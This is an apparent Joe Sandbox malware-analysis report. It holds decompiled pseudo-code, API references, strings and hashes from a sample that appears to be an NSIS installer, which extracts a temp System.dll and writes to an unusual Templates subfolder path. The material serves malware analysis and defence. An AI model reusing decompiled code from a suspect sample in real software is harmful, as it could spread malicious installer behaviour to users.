				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405DD6(E00406507(_t81, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless")), ??);
				} else {
					E00406507();
				}
				E0040678E(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040683D(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FD2(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405569(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E00406507("C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp", _t83);
						E00406507(_t83, _t81);
						E00406544(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406507(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp");
						_t64 = E00405B67("C:\Users\Arthur\AppData\Local\Temp\nsx50C8.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E00405569();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405569(0xffffffea,  *(_t86 - 8));
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B67();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless,?,?,00000031), ref: 004017D5

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Strings

Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsx50C8.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp$C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially\Tygnings\systemless$Call
API String ID: 1941528284-3015368767
Opcode ID: 65bccffe5e06326f75551bb9f8fdcf25cfe9e3226a81d0c778f20e467ed9889d
Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
Opcode Fuzzy Hash: 65bccffe5e06326f75551bb9f8fdcf25cfe9e3226a81d0c778f20e467ed9889d
Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405569(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429204;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
					}
					_t27 = lstrlenW(0x4226e8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226e8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226e8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226e8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x0040556f
0x00405579
0x0040557e
0x00405584
0x0040558f
0x00405592
0x00405595
0x0040559b
0x0040559b
0x004055a1
0x004055a9
0x004055ac
0x004055c9
0x004055cd
0x004055d6
0x004055d6
0x004055e0
0x004055e9
0x004055f5
0x004055fc
0x00405600
0x00405603
0x00405616
0x00405624
0x00405624
0x00405628
0x0040562a
0x0040562d
0x00000000
0x0040562d
0x004055ae
0x004055b6
0x004055be
0x004055c4
0x00000000
0x004055c4
0x004055be
0x004055ac
0x00405639

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,004033ED), ref: 004055C4
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll), ref: 004055D6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000), ref: 00406743

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll, xrefs: 0040558A, 0040559A, 004055A0, 004055C3, 004055CF

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll
API String ID: 1495540970-2428402151
Opcode ID: c20292047f9b9b2cdfb15f34b7f8afd72a7bd830ec6d368edf6b390704bd6bd1
Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
Opcode Fuzzy Hash: c20292047f9b9b2cdfb15f34b7f8afd72a7bd830ec6d368edf6b390704bd6bd1
Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				void* _t61;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x418ec0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004034AF( *0x42a278 + _t56);
				}
				if(E00403499( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E00403499(0x414ec0, _t91) == 0) {
									goto L33;
								} else {
									_t61 = E004060A9(_a8, 0x414ec0, _t91); // executed
									if(_t61 == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E00403499(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406A2F(0x40ce30);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E00403499(0x414ec0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce48 = 0x414ec0;
						 *0x40ce4c = _t92;
						while(1) {
							 *0x40ce50 = _t81;
							 *0x40ce54 = _v12; // executed
							_t69 = E00406A4F(0x40ce30); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce50; // 0x418ec0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00405569(0,  &_v148);
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce50; // 0x418ec0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E004060A9(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dc
0x004032de
0x004032de
0x004032e3
0x004032e8
0x004032f3
0x004032f3
0x00403305
0x00403450
0x00403450
0x00000000
0x0040330b
0x0040330f
0x0040343b
0x00403484
0x00403455
0x0040345b
0x0040345d
0x0040345d
0x0040346e
0x00000000
0x00403470
0x00403475
0x0040347c
0x00403435
0x00403435
0x00403452
0x00403452
0x00000000
0x00403452
0x0040347e
0x00403481
0x00000000
0x00403481
0x0040346e
0x0040348f
0x00000000
0x0040348f
0x00403440
0x00403442
0x00403442
0x0040344e
0x0040348c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040344e
0x00403320
0x00403323
0x00403328
0x00403328
0x00403332
0x00403335
0x00000000
0x00000000
0x00000000
0x00000000
0x0040333b
0x0040333b
0x0040333b
0x00403343
0x00403345
0x00403345
0x00403356
0x00000000
0x00000000
0x0040335c
0x0040335f
0x00403365
0x0040336b
0x00403373
0x00403379
0x0040337e
0x00403385
0x00403388
0x00000000
0x00000000
0x0040338e
0x00403394
0x00403396
0x004033a3
0x004033a5
0x004033d6
0x004033dc
0x004033e8
0x004033ed
0x004033ed
0x004033f2
0x00403429
0x00000000
0x00000000
0x00000000
0x004033f4
0x004033f8
0x0040340d
0x00403410
0x00403413
0x00403419
0x0040341d
0x00000000
0x00000000
0x00000000
0x00403423
0x004033ff
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x004033f2
0x00403431
0x00000000
0x00403431
0x00000000
0x0040333b

APIs

GetTickCount.KERNEL32 ref: 00403315
GetTickCount.KERNEL32 ref: 00403396
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C3
wsprintfW.USER32 ref: 004033D6

Strings

... %d%%, xrefs: 004033D0
G8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$G8@
API String ID: 551687249-649311722
Opcode ID: 461fed4ca99b5d52942f23dd80306040ee863ae81dd43071bafdd45334f3c5c4
Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
Opcode Fuzzy Hash: 461fed4ca99b5d52942f23dd80306040ee863ae81dd43071bafdd45334f3c5c4
Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406864(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x0040687b
0x00406884
0x00406886
0x00406886
0x0040688a
0x0040689d
0x00406897
0x00406897
0x00406897
0x004068b6
0x004068ca
0x004068d1

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
wsprintfW.USER32 ref: 004068B6
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Strings

UXTHEME, xrefs: 0040686D
\, xrefs: 0040688C
%s%S.dll, xrefs: 004068B0

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A38(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a43
0x00405a47
0x00405a4a
0x00405a50
0x00405a54
0x00405a58
0x00405a60
0x00405a67
0x00405a6d
0x00405a74
0x00405a7b
0x00405a83
0x00405a85
0x00000000
0x00405a85
0x00405a8f
0x00405a96
0x00405aac
0x00000000
0x00000000
0x00000000
0x00405aae
0x00405ab2

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
GetLastError.KERNEL32 ref: 00405A8F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
GetLastError.KERNEL32 ref: 00405AAE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Uniqueness

Uniqueness Score: -1.00%

Function 6E551817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E6E551817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6e55506c = _a8;
				 *0x6e555070 = _a16;
				 *0x6e555074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6e555048, E6E551651);
				_push(1); // executed
				_t37 = E6E551BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6E55243E(_t54);
					}
					_push(_t54);
					E6E552480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E6E552655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6E551666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E6E552655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E6E552655();
							_t37 = GlobalFree(E6E551312(E6E551654(_t54)));
						}
